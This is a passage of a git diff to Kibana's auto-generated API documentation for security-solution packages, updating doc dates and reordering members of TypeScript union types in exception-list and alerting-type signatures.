b/api_docs/kbn_securitysolution_hook_utils.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-hook-utils title: "@kbn/securitysolution-hook-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-hook-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-hook-utils'] --- import kbnSecuritysolutionHookUtilsObj from './kbn_securitysolution_hook_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json b/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json index 3254f3ff0380c..71af5adccadde 100644 --- a/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json +++ b/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json @@ -846,7 +846,7 @@ "label": "Type", "description": [], "signature": [ - "\"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" + "\"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" ], "path": "packages/kbn-securitysolution-io-ts-alerting-types/src/type/index.ts", "deprecated": false, @@ -860,7 +860,7 @@ "label": "TypeOrUndefined", "description": [], "signature": [ - "\"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\" | undefined" + "\"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\" | undefined" ], "path": "packages/kbn-securitysolution-io-ts-alerting-types/src/type/index.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx b/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx index afc8d07926d97..da11fe7721ba4 100644 --- a/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx +++ b/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-alerting-types title: "@kbn/securitysolution-io-ts-alerting-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-alerting-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-alerting-types'] --- import kbnSecuritysolutionIoTsAlertingTypesObj from './kbn_securitysolution_io_ts_alerting_types.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json b/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json index 7d8d22d454a68..5261280f27b3f 100644 --- a/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json +++ b/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json 
@@ -27,7 +27,7 @@ "label": "updateExceptionListItemValidate", "description": [], "signature": [ - "(schema: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" + "(schema: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | 
\"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, 
@@ -40,7 +40,7 @@ "label": "schema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | 
\"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, 
@@ -58,7 +58,7 @@ "label": "validateComments", "description": [], "signature": [ - "(item: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" + "(item: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | 
\"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, 
@@ -71,7 +71,7 @@ "label": "item", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | 
\"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, 
@@ -153,7 +153,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | 
\"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/typescript_types/index.ts", "deprecated": false 
@@ -1216,7 +1216,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" 
| \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/typescript_types/index.ts", "deprecated": false 
@@ -1307,7 +1307,7 @@ "label": "exceptions", "description": [], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: 
string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/typescript_types/index.ts", "deprecated": false 
@@ -1897,7 +1897,7 @@ "label": "CreateEndpointListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"os_types\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: 
\"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"os_types\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: 
string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_endpoint_list_item_schema/index.ts", "deprecated": false, 
@@ -1925,7 +1925,7 @@ "label": "CreateExceptionListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | 
\"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_exception_list_item_schema/index.ts", "deprecated": false, 
